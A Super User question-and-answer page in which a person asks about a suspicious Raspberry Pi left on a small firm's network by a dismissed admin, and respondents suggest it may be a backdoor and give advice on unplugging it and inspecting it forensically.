What would be the role of a Raspberry Pi hooked to a harddisk and a VPN?

2

1

I'm trying to troubleshoot the network at the SME of my girlfriend: the previous network admin was more or less trying to blackmail them (for example refusing to give the passwords of the various devices: NAS etc. unless he'd get money) so they got rid of him.

Now we're changing all the passwords from all the computers, cams, NAS, etc. and I found something weird in the cellar, next to the rack I found a little enclosure (not looking very professional, with apparently a hand-made hole to allow cables to pass into it): I opened it and it contains a Raspberry Pi hooked by USB to what is apparently a harddisk. There are two connections to that Raspberry: one USB cable to the harddisk and one ethernet cable which plugs into a TPLink VPN (the cable going to/from the Raspberry plugs into one of the four ethernet ports, not into the WAN port).

What would be the role of such a device in a "normal" company which has nothing to do with IT: it's a tax accounting company which has two small offices (hence the VPN)?

How can I find exactly what this Raspberry PI is used for? (I'm concerned that by turning it off I'd mess the network config)

Could this be some backup thing?

Note that I don't know if superuser is the correct stackexchange site to ask such a question and seen that I don't know what this Raspberry is used for, I don't know which tags to use.

Any help is very much appreciated.

Cedric Martin

Posted 2014-06-22T14:51:15.403

Reputation: 404

1Well if it doesn't seem like an essential function, I would unplug it NOW. If something breaks, you can plug it in - it might be a way for the guy who just got fired to get back into the network. – cutrightjm – 2014-06-22T15:15:09.980

Raspberry Pi is a mini 25$ computer, which can easily run some Linux versions. If you plug it to network, practically you can do everything. If it's owner is a hacker, he can get into your network and steal info easily (including files, passwords etc). So my recomendation is - unplug it and look what's inside hard drive. – Searush – 2014-06-22T15:31:23.857

@ekaj: and SEARAS too... Thanks, I did unplug it and everything seems to still be working fine. I'll see what the HD contains and if it's encrypted or not. Same for the SD-Card (?) that I found inside the Raspberry PI. – Cedric Martin – 2014-06-22T15:39:07.627

@SEARAS: I did as you said. Labelled all the cables so in case it's an important feature I'll be able to plug it back in. – Cedric Martin – 2014-06-22T15:39:43.533

Yes, check SD-card too. There can be hack-tools. If you know Linux and if you are hacker, then you can determine hack-tools easily (or give it to a hacker and he will tell you). Also having a (mini) computer attached to target network enables anyone to get very sensitive information (e-mail,social site passwords etc), and he can even get full control of network and all network computers (if he is smart enough). So if you find such hack-tools there, you must change all your personal passwords too (gmail, fb, etc) – Searush – 2014-06-22T17:31:35.100

Hackbox for allowing remote access to your network. MyLittlePwny or similar probably. – Fiasco Labs – 2014-06-22T18:00:33.870

Another form of it here: http://www.tunnelsup.com/raspberry-pi-phoning-home-using-a-reverse-remote-ssh-tunnel/ And there's even a custom OS over on SourceForge: http://pwnpi.sourceforge.net/ It's a heads up to watch for when you are dealing with a crook IT fool.

– Fiasco Labs – 2014-06-22T18:06:39.623

A torrent seedbox perhaps? – usr-local-ΕΨΗΕΛΩΝ – 2016-02-16T22:05:33.810

Answers

3

Asking this is a bit like: what is the purpose of this book? It has two hardcovers, many pages, an index and a glossary. You will never know until you look into it.

The USB disk contains some data, its ethernet port allows communication with both LAN and WAN. I don't understand why you are claiming it is hooked into a VPN.

Raspberry PIs, though diminutive in size, are just full-purpose computers. You can write code running on them for just about anything. Given the nature of the person who set this up and its location, its most likely use is as a backdoor into your system. The use of a backdoor is once again as general as it can be, including generally all sorts of nefarious schemes.

It seems unlikely though that it performs any network-related useful task. In your shoes, I would just unhook it from your network, and see what is going on. In any case, even if it were performing anything useful, how could you trust that it does not perform anything misschievious on the side?

Apart from using a network monitoring tool (which would yield much precious information), you may want to check the contents of the disk (if it is encrypted, then you can be pretty sure it was being used for illicit schemes), and the SD card of the RPi. You can get just plug the card into your pc, mount it and peruse the files that start automatically, i.e. the contents of /etc/init.d, /etc/rc.local, the existence of programs like autossh, openvpn and so on. Once again, if the card if encrypted, it is a safe bet he was up to something misschevious.

If you are really interested in this, and neither component is encrypted, then you may try using a hypervisor program (VirtualBox, HyperV, KVM, Xen, depending on your platform) to build a Virtual Machine booting from the SD card. There must be a billion Google references to Forensics in a Virtual Environment/Machine...

But most of all, I would very quickly unplug it.

MariusMatutiae

Posted 2014-06-22T14:51:15.403

Reputation: 41 321

thanks a lot. I did unplug it. I said it was hooked to a VPN because the ethernet cable goes from the Raspberry PI to a device which is obviously the VPN. However it was hooked into a a "regular" ethernet connector: I don't know if VPN device also work as plain switch (I'm no network admin). Although I'm bad with windows I'm proficient with Linux so I'll do the forensics as you suggested. Thanks a lot: I didn't realize that the Raspberry was something fully programmable like that. – Cedric Martin – 2014-06-22T15:42:35.843

@CedricMartin Someone can set up VPNs with any OS and a lot of different types of routers - just because it was plugged into a "regular" Ethernet port doesn't mean that there isn't a VPN. Also, I would have a friend that I trust look through the router/firewall for any fishy rules or such things - asap as well – cutrightjm – 2014-06-23T04:51:56.283

Asked: 2014-06-22T14:51:15.403

Viewed: 139 times

Active: 2014-06-22T15:31:05.380